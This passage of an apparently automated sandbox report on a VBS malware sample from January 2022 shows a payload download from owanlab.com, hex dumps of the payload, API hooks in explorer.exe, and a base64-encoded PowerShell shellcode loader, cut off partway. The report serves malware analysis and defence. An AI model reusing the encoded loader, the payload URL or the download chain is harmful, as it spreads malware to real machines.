                      Jan 21, 2022 17:27:10.715939045 CET53566218.8.8.8192.168.2.4
                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                      Jan 21, 2022 17:25:52.425013065 CET192.168.2.48.8.8.80x2ac5Standard query (0)owanlab.comA (IP address)IN (0x0001)
                      Jan 21, 2022 17:27:08.573812008 CET192.168.2.48.8.8.80x93ddStandard query (0)www.ordemt.comA (IP address)IN (0x0001)
                      Jan 21, 2022 17:27:10.668698072 CET192.168.2.48.8.8.80xc646Standard query (0)www.ordemt.comA (IP address)IN (0x0001)
                      Jan 21, 2022 17:27:10.694746017 CET192.168.2.48.8.8.80x2370Standard query (0)www.ordemt.comA (IP address)IN (0x0001)
                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                      Jan 21, 2022 17:25:52.672385931 CET8.8.8.8192.168.2.40x2ac5No error (0)owanlab.com157.7.107.166A (IP address)IN (0x0001)
                      Jan 21, 2022 17:27:08.597714901 CET8.8.8.8192.168.2.40x93ddName error (3)www.ordemt.comnonenoneA (IP address)IN (0x0001)
                      Jan 21, 2022 17:27:10.688636065 CET8.8.8.8192.168.2.40xc646Name error (3)www.ordemt.comnonenoneA (IP address)IN (0x0001)
                      Jan 21, 2022 17:27:10.715939045 CET8.8.8.8192.168.2.40x2370Name error (3)www.ordemt.comnonenoneA (IP address)IN (0x0001)
                      • owanlab.com
                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      0192.168.2.449823157.7.107.166443C:\Program Files (x86)\Internet Explorer\ieinstal.exe
                      TimestampkBytes transferredDirectionData
                      2022-01-21 16:25:53 UTC0OUTGET /bin_DziiNe252.bin HTTP/1.1
                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: owanlab.com
                      Cache-Control: no-cache
                      2022-01-21 16:25:53 UTC0INHTTP/1.1 200 OK
                      Date: Fri, 21 Jan 2022 16:25:53 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 190016
                      Connection: close
                      Server: Apache
                      Last-Modified: Thu, 20 Jan 2022 23:57:09 GMT
                      Accept-Ranges: none
                      Vary: Range,Accept-Encoding
                      2022-01-21 16:25:54 UTC0INData Raw: 1b 6f e2 ea 1c a6 3a 1a 86 70 89 17 ab 2a 8b dd 48 51 f3 1b 80 de ac 97 69 25 e5 e7 cf e4 92 f6 84 5a 56 ae 6e 4b 86 a4 3a 79 78 f5 f9 47 c8 ae ac 9c 7f 8b 63 b4 c0 dc 2a 11 6a 28 da bd c4 0f 21 b3 36 bf 3e af 72 6a 20 5c b8 5b 4b 07 74 fd 46 94 13 ca 1e e6 88 3d d2 74 1c fa 76 69 b4 2c fd b7 23 46 24 ce 49 be fc f4 64 9e a4 d5 f1 b0 6f 33 f7 a9 8f 06 42 7f e6 6b c6 26 8c d0 1c 9a 96 99 10 94 00 4a 51 46 c9 15 40 9a 9d 7f 96 fb a0 a3 12 ec 52 a5 bb 9e 4c 25 56 f0 f4 30 77 35 68 49 73 b3 f6 1b 7b 6b 92 70 dc 11 13 0b f3 c0 17 78 91 3f 8e c0 ce bb 65 64 f0 ad 38 87 e7 4e ef bb 80 a9 78 b4 63 0f 04 db ff 10 5a 96 af 8e 53 40 f1 3e d6 90 a7 e0 7d 22 cf e5 0c b9 87 b8 e3 89 35 fa 3e 76 1c 6b 49 f1 9a 37 1e 24 1c ec 22 47 17 04 41 05 72 02 2c c7 ff c9 87 1d 7a
                      Data Ascii: o:p*HQi%ZVnK:yxGc*j(!6>rj \[KtF=tvi,#F$Ido3Bk&JQF@RL%V0w5hIs{kpx?ed8NxcZS@>}"5>vkI7$"GAr,z
                      2022-01-21 16:25:54 UTC16INData Raw: a2 f7 cb e8 88 85 3d 02 b5 32 af bb 6a 5c 43 27 dc 6e 5e 11 ff ca 42 6a 32 50 92 d5 2d d1 3e 08 fb 70 3c b9 29 05 86 db 9d c3 9e a1 69 d3 75 f1 9b 0e b6 0c 45 1e d9 1a 36 2e ff c9 04 28 1f f8 15 20 7d d3 01 b7 e0 b6 43 d6 81 ff 63 76 ab 9b 33 91 c2 45 b2 fb 93 7a 03 e4 09 7d df 3a 53 74 63 c0 e7 6f 6c 2e f6 65 28 50 8d 03 20 68 3b 74 c7 00 42 81 79 cd 98 b9 1d 41 82 68 6a 89 eb fa 7f e2 ca 2d fd 3a ac 66 6d ce 49 ef 71 61 1c 60 5b 2a a3 e6 87 84 99 a9 8f 85 86 37 65 d5 32 2f 4c d0 1c 17 1f c6 72 85 00 77 de d7 e3 ad 41 a2 7d d5 4c 0b c2 d0 32 19 e9 be ff 6f 93 dc 7d 93 95 5e 6d 40 95 26 39 5d 58 f1 05 05 b2 92 24 a5 5c 44 a0 b1 28 47 1d 1f dd cc c3 32 85 68 9a ae 52 86 20 49 45 47 88 43 7f fa 66 b6 eb 49 2f 69 3c 4c bd df 7f 32 3d 87 15 0d 4c 14 2d 73 ba
                      Data Ascii: =2j\C'n^Bj2P->p<)iuE6.( }Ccv3Ez}:Stcol.e(P h;tByAhj-:fmIqa`[*7e2/LrwA}L2o}^m@&9]X$\D(G2hR IEGCfI/i<L2=L-s
                      2022-01-21 16:25:54 UTC32INData Raw: 89 03 75 7e fc 05 41 93 26 26 6b 80 7b 07 01 86 3c 78 f9 e9 52 53 7f 66 eb a4 a8 46 87 1c f8 69 12 eb 93 4f 63 77 09 b8 b4 55 a8 e2 ca 60 da 8e e8 7c e3 54 65 68 0f 43 17 1a 3f 6d ab 38 bb 56 af 5b c7 d2 ed fd 68 cd f6 62 b4 af 9c c3 4e 34 8d ed e7 c3 5b 5b ed 22 5d 68 0b 27 a5 d0 00 36 0a 64 7f dd 28 52 cf 6f 50 2d 42 31 c7 aa f2 14 dc 4b 26 b9 df 06 c4 03 68 52 84 a9 3e 84 09 39 9e ae 15 8a 9c ad e7 77 e7 0c 2e 2e 2e 05 56 9c 75 8f d7 38 07 9c 37 33 8e fe 13 bf 11 70 ca 1d fc 1d 08 53 1a 45 bc 94 fd b7 23 ae 84 f3 48 be 3b f2 78 9e a4 d5 36 f6 6b 33 f7 a9 8f 8d 15 5b 6f 3d ce ad 0b f0 95 dc 94 0d e5 b6 89 b0 48 00 bf 99 c2 12 58 d7 94 87 42 97 0a 15 66 d2 83 54 2c 48 76 93 cb 03 da b5 3a a6 c8 08 06 cd 13 02 e7 92 5e ba 02 48 25 32 0e 08 7e 1f a8 48 03
                      Data Ascii: u~A&&k{<xRSfFiOcwU`|TehC?m8V[hbN4[["]h'6d(RoP-B1K&hR>9w...Vu873pSE#H;x6k3[o=HXBfT,Hv:^H%2~H
                      2022-01-21 16:25:54 UTC48INData Raw: 3a 9a 42 a8 2d 6d 4c a2 40 67 d3 93 83 68 80 9d 9d 0d a7 0e c4 09 cb 64 e7 eb bc eb df 50 1d b9 29 57 5b 70 89 03 ac 5a f8 e4 11 80 fc 98 3d 87 35 0b e0 22 35 52 3e 87 db 6f 6b ba e8 65 64 ec 77 dc 26 29 9b 3e 4b 8a 45 7f 0d de 49 bc 6c 80 f1 e6 fd 32 a2 3f 4b 59 52 6e 0d 29 5f 1b 3d d0 3d eb 10 a9 ad d0 6e ef bf 1a 3e be f7 62 78 1c 9d c3 46 ad 89 bf cc c0 12 bb ac 6a 23 4c d1 44 d0 f0 6a 7d 02 07 dc 0d eb df d2 e9 01 af e0 fc 48 3e 73 00 9c 4a fa 14 c7 db 47 c5 cf c0 70 81 46 69 e1 c3 6b bf ad 02 ec ae 0f aa 5d e8 73 64 a6 ac 9a f5 11 05 3b 38 1f 74 35 0e 85 2d 43 c5 99 bb 0b fd fa f4 69 f9 97 f6 30 be fd b7 23 c5 9a 06 45 be fc f4 6b 1a 21 d5 f1 b0 e4 4e 03 2c 70 72 3c 15 e7 01 c6 ce 78 e1 1d 9a 1b 46 a8 ca 8d 68 64 9d e8 ad 13 85 06 b6 20 07 36 2f b1
                      Data Ascii: :B-mL@ghdP)W[pZ=5"5R>okedw&)>KEIl2?KYRn)_==n>bxFj#LDj}H>sJGpFik]sd;8t5-Ci0#Ek!N,pr<xFhd 6/
                      2022-01-21 16:25:54 UTC64INData Raw: bc 29 9b ca 15 27 97 77 46 0a 58 f9 db 76 0f 26 53 79 c0 e2 db ec c6 11 eb f0 79 05 cc b9 3f 6d c8 4b 70 b5 ba 0f f4 ae f1 a1 30 5f fd 67 3b d9 8b 34 7d 32 08 5d 9b e6 57 e7 23 11 e2 66 e4 7c 6a f9 1f 69 b5 40 0e 02 d8 51 aa d8 a8 2e 11 d7 24 e5 07 f6 ca f4 e2 88 7f 99 a8 60 9e 81 3b 66 3e bc dc ef 60 c4 fb 7a 16 30 d7 3b d2 a8 d3 ba d8 80 84 33 6e b1 ae 38 23 87 26 ac a5 7c 86 ce 73 b2 4b 6a 9e 52 85 71 a5 8f 60 de 34 95 63 2a 2f 1f 32 6f 62 3c 46 f6 d3 6c 5e 18 9b 9d 64 66 a8 c1 3c 60 5b 2f 53 67 02 07 28 1d eb df 01 47 19 9a be 2a 4d 4f 22 c3 17 8c cf 03 cc a9 15 3a 19 0c e7 8d 5f 78 f6 45 0a e8 45 ba 21 ad e7 aa a8 e1 2c b3 8d 24 97 37 e3 8f b6 d7 bd 73 43 2d d7 57 cd c2 96 b2 57 00 05 88 46 53 7f f6 09 2c fd 34 e7 4e 7b 90 12 35 19 a9 a7 92 84 38 a9
                      Data Ascii: )'wFXv&Syy?mKp0_g;4}2]W#f|ji@Q.$`;f>`z0;3n8#&|sKjRq`4c*/2ob<Fl^df<`[/Sg(G*MO":_xEE!,$7sC-WWFS,4N{58
                      2022-01-21 16:25:54 UTC80INData Raw: 72 6f 4d 46 5b 03 94 50 ce 1c 6b b5 b4 a7 4e 55 d1 40 d0 c2 91 3a e0 bf dd b1 7e 9f ec 50 36 c5 7c 2d 30 68 29 be 23 d5 da 75 f6 21 69 9c 48 30 24 a9 cb 64 5f f4 27 8e 5e 6e c6 11 08 ac ff 8c 41 68 4f 4e cc 3f 1a b0 ca a5 f7 ac f6 1b 16 21 bf 98 b8 96 12 ed 40 b9 b2 88 16 7b b1 32 75 13 69 eb 31 04 41 ff 6b 03 81 e9 19 6c 7f fc 03 b3 3c 82 94 17 da 79 3c 57 06 cb d3 43 c9 ae 6a 66 8e f9 e8 2a be bb ac 9d 4b 6e 57 d6 ca ef 02 43 f1 ac 7d 17 d8 80 84 bf 0b 4e 51 38 23 df fc 32 64 6f 0d 43 17 16 3f 70 90 c0 a8 3a 12 ef f4 f7 ea fb d2 6a 48 ca 35 19 c0 cf 9b c3 77 07 d6 85 93 63 57 a6 78 c7 b1 c2 67 5d 45 f6 07 bf 72 2d 91 df 82 08 4c 01 6b e0 62 aa 7f 00 17 5c bb 75 66 86 6c 84 78 87 a8 00 8a c0 c5 31 d3 1e ad 8b 9c ae 2c a0 21 3d ca e5 d6 af 72 e3 55 dc 5d
                      Data Ascii: roMF[PkNU@:~P6|-0h)#u!iH0$d_'^nAhON?!@{2ui1Akl<y<WCjf*KnWC}NQ8#2doC?p:jH5wcWxg]Er-Lkb\uflx1,!=rU]
                      2022-01-21 16:25:54 UTC96INData Raw: 35 c3 cd 65 57 9f 68 17 9f 9c 25 62 13 63 be 8d 37 e6 d6 f0 37 93 05 49 73 2b 7a dd 1e c5 26 ea 22 c8 9d b7 7d 84 3f a9 a4 fc 77 01 a9 18 2e a4 c2 1d ed 51 d0 8c c4 1b 3c 23 8f 32 58 e6 c8 88 98 96 59 94 a0 72 f6 1e 24 d1 66 5f eb 1f 86 ac 23 21 50 f9 db 32 8f 38 9a bb cf 66 1a 67 40 b9 74 b5 fd df 17 22 86 aa 67 c1 e5 e1 47 18 05 ce 5f 0c 53 28 e8 73 3b 52 83 fd 78 31 08 f2 9f 83 1f 62 e4 11 69 eb ed 69 a1 42 94 fc bb be 9b bf 04 96 04 cc 07 71 43 81 47 93 4c f6 ca 80 06 60 38 f3 a9 6e 1f 3d e6 68 43 10 de ef cf 1a 3c 10 5c bd 8f c6 7f bf b4 a8 88 d6 6f 6c 59 a5 ae bb 64 0f a7 e1 58 56 ca 43 17 4d e4 7d 3d 40 7a 24 26 46 96 91 bf 70 54 e9 29 c7 ce c3 10 47 f7 37 81 3c 08 a0 73 0a 25 66 23 26 55 f5 e1 5d 8d ce a8 10 65 d1 bd 37 04 ac fe 3a 6b f7 6e be 7f
                      Data Ascii: 5eWh%bc77Is+z&"}?w.Q<#2XYr$f_#!P28fg@t"gG_S(s;Rx1biiBqCGL`8n=hC<\olYdXVCM}=@z$&FpT)G7<s%f#&U]e7:kn
                      2022-01-21 16:25:54 UTC112INData Raw: 95 b9 bc d2 18 0a 39 70 8d 67 b0 16 63 c1 51 a0 b4 58 6b 03 0f 55 48 58 ec 20 3b 84 49 d0 81 7d 1d 0b 8e bc 89 6b 8b 83 f8 ed ae 4f 4d d5 a0 e7 1a e8 53 5a 20 09 f3 58 a2 1e d6 a1 ec 2a 7a a1 59 45 7a 89 b8 bc 3c 15 35 9e fe fb a4 2e 8d 3c 71 1e c2 33 df f8 f2 d7 7c e5 40 b4 2b a8 57 44 5c f5 ef 60 79 00 a1 0b e5 7a 60 b2 09 f7 99 ca 69 b1 df a4 6e ad ba 8d 69 ed 40 57 c2 e8 44 2b 0a be 4d 44 6c e4 af 71 91 60 02 eb 33 f3 25 bc 84 48 0a fe a0 f3 85 6d d4 fa ee fb 69 06 42 37 a2 86 21 58 18 2f 2f 94 9f 9e b9 b2 55 58 c9 3f b9 5d eb b3 82 eb 0a c5 07 71 79 71 c7 46 97 63 35 61 88 98 a7 b6 a1 bd 33 c6 e6 12 44 6f e5 08 1a 57 dc fe 10 f0 9f 97 47 57 d4 17 58 53 ac 92 3b 09 af bb e7 cb fd 31 1f 04 b2 43 e7 f9 2b fb 98 88 96 af e0 d8 0d 45 87 71 4a e2 29 ee 42
                      Data Ascii: 9pgcQXkUHX ;I}kOMSZ X*zYEz<5.<q3|@+WD\`yz`ini@WD+MDlq`3%HmiB7!X//UX?]qyqFc5a3DoWGWXS;1C+EqJ)B
                      2022-01-21 16:25:54 UTC128INData Raw: f9 4f af 30 45 85 ae 93 c8 ed 80 23 25 9b 47 9b 86 71 72 33 84 33 a3 69 f8 36 d1 a1 4c 3e 59 ce 86 d2 fa 74 42 53 24 70 ea d5 93 a2 7e ad d3 11 b9 35 00 20 76 c3 c3 64 be 89 b0 89 f9 3b b2 7b 96 63 fb 28 92 66 e6 8b d4 26 c4 81 30 92 6b e0 07 bd 67 1d 9d d0 c0 d8 1d 95 67 e6 c2 36 7a 3f 0d aa 5f e2 dc 70 54 48 f8 3c 7e 2e 6b 2f c5 d3 a0 6f 31 06 42 dd 45 6d 10 a5 bb c5 c9 e7 da fa 30 74 d1 56 c3 9c 2e 4d a4 ef ba cd da f1 a4 9e bc 2e 41 69 bf 4a 6b b4 03 5e 4b 64 18 6a b2 f1 dc e6 29 61 0a a0 ed 20 77 06 c9 c3 d7 ba 84 7b 29 8c 6b 8b 2f dc f9 f6 cd 81 32 2e 62 5b 19 e7 ee b0 47 b2 fe 3f 49 1c 7d c8 18 6e 9b ea 92 14 37 7a 85 f2 0f 9b 0a 98 70 5e fa f0 84 e6 b9 0c 7a fd 54 29 54 81 a2 4d 0c 08 a1 45 02 d1 11 77 05 f6 4b 1d 09 8d 7f dc 16 c4 7c 04 7e c3 34
                      Data Ascii: O0E#%Gqr33i6L>YtBS$p~5 vd;{c(f&0kgg6z?_pTH<~.k/o1BEm0tV.M.AiJk^Kdj)a w{)k/2.b[G?I}n7zp^zT)TMEwK|~4
                      2022-01-21 16:25:54 UTC144INData Raw: ad dc b0 1b eb f2 df d6 cc 58 ec ae 1a 2c 1b 14 0a 53 63 7a 00 a9 c0 71 8a 70 39 a8 94 41 5d 24 a5 d3 2a f1 ac 47 95 87 6f 25 77 d2 13 b3 b7 19 1d 35 20 af df 9d b4 49 b4 b8 33 ec 5c 94 dc e0 3a 4f 9b a3 0a b4 13 c9 71 f6 45 ec 68 eb 0e cd a9 33 61 d2 c2 f9 e1 00 d1 5e e4 01 b3 bf be 80 f9 e2 9a e9 cf 41 35 f6 d0 15 28 69 6a b5 71 aa 54 94 53 89 a1 fd 4f 46 1d ee d5 e1 74 78 b3 56 d9 b5 0c 2c 15 0b 96 8e cb fb 1a 6a d0 10 8c fa 32 a1 02 03 02 e8 3a 9e c7 16 f1 9a 7e 2f e1 38 96 e0 db fb 3c ea bb 94 17 ca 0b c9 66 da 64 5b 1e 4a 0c 7e c4 21 07 88 84 36 83 5f a2 c5 2f 75 dd bb 28 21 d0 a8 d4 9c 75 a8 3a 97 48 6a aa 69 cc 18 7b c2 b1 b8 bc 5e 3d a8 5f c2 d4 6c ba 7d d0 c3 a4 12 0b a8 76 5b 5e 1c 86 cd 3f 28 c7 ac da 15 53 35 45 f1 10 02 8d 33 cb f7 d5 58 2b
                      Data Ascii: X,Sczqp9A]$*Go%w5 I3\:OqEh3a^A5(ijqTSOFtxV,j2:~/8<fd[J~!6_/u(!u:Hji{^=_l}v[^?(S5E3X+
                      2022-01-21 16:25:54 UTC160INData Raw: 92 cf 99 62 13 c6 38 50 59 f8 c5 3e ef 40 f6 5e 7f 6a 21 93 3d 35 5e d7 e3 e3 bd 67 25 2d b3 3d fd f2 a6 09 2a 43 85 63 38 b1 c9 30 2b 87 82 a4 ac 58 d3 07 b0 76 7f 19 52 ff c8 8e 88 fc 6b 49 3e 61 dd b5 f5 dd af f9 f3 3c 87 70 63 49 71 83 04 50 9c f0 96 99 95 47 49 54 6c fb 1d 44 71 0c 41 e2 31 82 6e ce 2e 53 f2 a1 c3 64 fb f3 46 fa a2 be 01 c9 cf 4f 13 17 82 a1 89 8d 00 27 49 d4 0f 70 c2 97 bc 63 72 f8 bd 43 d1 da c0 1b 8b 54 39 6f 8e fe 5d 24 4d 61 7c 5e 9c da b6 a6 1c f8 6c fc d5 c8 cc af 5f d0 71 04 c3 96 11 8b 7f 69 46 d5 d5 53 e5 38 e2 49 5b 54 db 4f 51 e6 55 4a db 2c 78 12 ef 32 ad 4e 6d 72 fa a0 96 ce 62 66 d8 df f8 99 f2 8f b6 b1 8b 44 59 db 30 ff 2b f6 01 89 22 b0 dd 44 da 89 55 fb 8c 3e 2f c6 4a bf b0 dc 48 20 f0 6c 63 7f 6a 96 4b a4 88 2b 02
                      Data Ascii: b8PY>@^j!=5^g%-=*Cc80+XvRkI>a<pcIqPGITlDqA1n.SdFO'IpcrCT9o]$Ma|^l_qiFS8I[TOQUJ,x2NmrbfDY0+"DU>/JH lcjK+
                      2022-01-21 16:25:54 UTC176INData Raw: 45 a3 87 37 bd f8 57 91 7b 08 27 b8 8c 87 69 0a ae d4 dd 6b ee bb c1 71 4b df db 78 80 ba 40 e5 9d b6 7c 6e 6f 40 08 51 83 6a 4c 41 11 06 02 21 2d 87 a1 d4 66 0d 87 cc 75 dd ba e4 b4 53 f7 de 48 49 42 a2 b3 91 2c 02 f2 fb 8e 0c 3d bd e7 81 d7 31 02 1f ca c5 d9 a0 b9 6f d2 00 6d fc 74 44 5d 5a 1a b0 f1 5c e5 41 7e 98 0d 74 84 41 84 ba 16 92 55 a5 c2 68 18 e6 9a 9b 7a f1 0e 9e 8d 84 4a 56 a9 dc 2d 66 8f a9 89 66 da e3 ba 21 4d ec 7c b6 10 e2 76 76 09 6b e9 4e 91 35 8f de 13 49 76 50 9a cf 38 e9 74 07 33 31 08 01 93 e9 c9 0f 25 28 70 b1 80 54 8d 89 e5 9a e2 38 72 02 3b b7 d8 16 cc 39 d2 e7 08 d9 57 f0 b4 74 a7 8f 3d 09 5a 97 36 a7 c4 79 48 f6 18 24 9e ee cc 47 45 27 49 1a 42 c5 66 ee fb fb 0e d5 2c ae 1a 6f f0 79 96 51 a2 6d a7 b4 fa c3 c1 f5 b0 2d 79 2d ca
                      Data Ascii: E7W{'ikqKx@|no@QjLA!-fuSHIB,=1omtD]Z\A~tAUhzJV-ff!M|vvkN5IvP8t31%(pT8r;9Wt=Z6yH$GE'IBf,oyQm-y-


                      Code Manipulations

                      Function NameHook TypeActive in Processes
                      PeekMessageAINLINEexplorer.exe
                      PeekMessageWINLINEexplorer.exe
                      GetMessageWINLINEexplorer.exe
                      GetMessageAINLINEexplorer.exe
                      Function NameHook TypeNew Data
                      PeekMessageAINLINE0x48 0x8B 0xB8 0x89 0x9E 0xE0
                      PeekMessageWINLINE0x48 0x8B 0xB8 0x81 0x1E 0xE0
                      GetMessageWINLINE0x48 0x8B 0xB8 0x81 0x1E 0xE0
                      GetMessageAINLINE0x48 0x8B 0xB8 0x89 0x9E 0xE0

                      Click to jump to process

                      Start time:17:23:14
                      Start date:21/01/2022
                      Path:C:\Windows\System32\wscript.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\New _Inquiry P.O4622.vbs"
                      Imagebase:0x7ff73d2b0000
                      File size:163840 bytes
                      MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      Start time:17:24:27
                      Start date:21/01/2022
                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBMAEEAQwBUAEkARgBFAFIATwAgAGIAcgBlAGcAbwAgAEsAbgBvAGIAZQB0AHMAZgByAGkAOQAgAEgAZQBzAHQAMwAgAEcAcgB1AGUAcwBvAG0ANAAgAEcAZQBuAGUAcgBhAGwAaQBzACAAQQBGAE0ARQBKACAAYgBlAGEAdgBlAHIAIABCAEkAQgBMAEkATwBHAFIAIABEAGQAbQBhAG4AZABzAGsAbgA1ACAAbgB1AGwAbABpAG4AIABsAG4AcABvAHQAcwB5AHMAdABlACAAVABoAHIAZQBhAHAAZQBkAGEAZgAgAE8AdQB0AHcAcgBlAHMAIABHAFQARQBWAEkAVgAgAFUAbgBzAGgAYQBjAGsAbABpADgAIABjAG8AcgByAGUAIABMAEEAUgBNAEUATgBTAEYAIABEAGkAcwB0AGkAbgBnAHYAOAAgAGQAaQBzAGUAbQBiAG8AIABIAFkAUABFACAAVQBuAGYAaQBsADkAIABWAEEATgBEAEIAUgBOAEQAQQAgAEcAZQBuAG4AZQAgAEIAZQBtAGUAcwB0AHIAZQA0ACAAaQBuAGQAcABhACAAQgBpAHQAcwB5AGwAZQAgAFQAZQByAG4AYQBzAGgAZQAgAEsAbwBrAGEAcgBkACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABiAHIAbgBlAGMAeQBrAGwAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAGIAcgBuAGUAYwB5AGsAbAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIAByAGUAcwB0AGIAZQBsAGIALABpAG4AdAAgAEQAeQBiAGIANgAsAHIAZQBmACAASQBuAHQAMwAyACAAYgByAG4AZQBjAHkAawBsACwAaQBuAHQAIABhAHAAcABsAGkAZQAsAGkAbgB0ACAAYgByAG4AZQBjAHkAawBsADcAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAEYAaQBsAGUAQQAoAHMAdAByAGkAbgBnACAAaQBtAG0AYQBuACwAdQBpAG4AdAAgAEgAeQBwAG8AZwB5AG4AeQBiACwAaQBuAHQAIABEAGkAcwBjAGkAcABsADMALABpAG4AdAAgAGIAcgBuAGUAYwB5AGsAbAAwACwAaQBuAHQAIABQAGUAdAB1AG4AaQBlAHIAbgAsAGkAbgB0ACAARwByAHUAbgBnAGUAcwBtAGkAdAAsAGkAbgB0ACAARABlAG0AbwByAGEAbAA1ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEQAeQBiAGIANgAwACwAdQBpAG4AdAAgAEQAeQBiAGIANgAxACwASQBuAHQAUAB0AHIAIABEAHkAYgBiADYAMgAsAHIAZQBmACAASQBuAHQAMwAyACAARAB5AGIAYgA2ADMALABpAG4AdAAgAEQAeQBiAGIANgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABEAHkAYgBiADYANQAsAGkAbgB0ACAARAB5AGIAYgA2ADYALABpAG4AdAAgAEQAeQBiAGIANgA3ACwAaQBuAHQAIABEAHkAYgBiADYAOAAsAGkAbgB0ACAARAB5AGIAYgA2ADkAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAQgBpAHMAYQBtAHMAYwBoAHUAIABEAG8AdgBlAG4AOAAgAEMAYQBsAHkAIABLAHUAbABkAGkAbwB4AGkAZAAgAGcAcgBhAGYAaQBrAHIAdQB0AGkAIABMAGsAawBlAHIAbgAgAEsAYQBuAG8AbgBpADkAIABDAGgAZQBsADkAIABlAG4AZABlAGIAYQBsAGwAZQBuACAAZABpAHMAawAgAFQAYQBkAGUAYQB3AG8AdQBjADQAIABVAGkAdABvAHQAYQBuAHUAZAA4ACAAQwB1AHQAbABhAHMAcwBmADQAIABSAGgAaQBwADgAIABUAGUAbgBkAGUAcgBlAGUAbwAgAHIAZQBpAG4AaABvAGwAZAAgAEgAagBlAG0AdgBpAHMAZQBsAHUAOQAgAEgAVQBSAFIAUwAgAE8AbQBuAGkANgAgAEIAaQBnAGcAaQBzADUAIABPAGgAbQBhAHYANAAgAEIAdQBjAGgAIABQAGUAZwBnAHkAcABhAHIAYQAgAG4AdgBuAGkAbgBnAGUAZABvACAARgBPAEUATABHAEUAUwBFAEQAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAHMAbwB1AG0AIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIARQBYAEMATABVAEQAIgAgAA0ACgAkAGIAcgBuAGUAYwB5AGsAbAAzAD0AMAA7AA0ACgAkAGIAcgBuAGUAYwB5AGsAbAA5AD0AMQAwADQAOAA1ADcANgA7AA0ACgAkAGIAcgBuAGUAYwB5AGsAbAA4AD0AWwBiAHIAbgBlAGMAeQBrAGwAMQBdADoAOgBOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKAAtADEALABbAHIAZQBmAF0AJABiAHIAbgBlAGMAeQBrAGwAMwAsADAALABbAHIAZQBmAF0AJABiAHIAbgBlAGMAeQBrAGwAOQAsADEAMgAyADgAOAAsADYANAApAA0ACgAjAFMAVQBQAEUAUgAgAFMAVABPAEMASwBJAEwAWQBSACAAUwB0AG4AawBlAGwAYQA1ACAAZQBtAHAAcgBvAHMAdAAgAGQAZQBmAGkAbgBpAHQAdAAgAFMAZQBwAGkAYQBiAHIAdQAxACAAdABvAHAAbwBnAHIAYQBmAGUAcgAgAEQAUgBZAFAAUwBUAEUATgAgAEYAcgBlAGsAdgA2ACAARABlAGwAaQBiAGUANgAgAE0AYQB0AGkAYQBzADMAIABoAHUAcwBuAGkAbgBnAGsAdgAgAEgAdQBzAG0AIABDAEgARQBFAFMARQBGAEwAIAB2AGEAYQBnACAAVABoAGUAbAAgAFMAdQBwAGUAcgA1ACAAcwBhAGMAcgBpAHMAdAAgAFYAZQBkAHMAdABhAGEAIABCAGEAZwB0AHUAbgAgAFAAcgBvAHQAeQBsAHMAMgAgAFMAdAByAHkAZwBlAGsAdgBhADEAIABJAE0ATQBPAEwAQQBUACAAUwB0AGUAZAAgAHMAYwByAGkAIABmAGUAZABlAHYAYQByACAAUABlAHIAaQBvAGQAYQAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAcwBuAGEAcgBlAG4AcwAiACAADQAKACQAYgByAG4AZQBjAHkAawBsADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAGIAbAB1AGUAYgAuAGQAYQB0ACIADQAKACMARQB0AHQAaQBuAHoAbwBtAGIAaQA0ACAAaQBuAHQAZQBsAGwAZQBrAHQAIABNAGUAbgBzAHUAcgBhACAAZgByAGkAaABhACAAUwBoAHUAdABpAG4AZwBkAGkAZQAgAFMASwBSAFYAUwBSACAAUwBjAGgAaQBuAGQAeQBsAD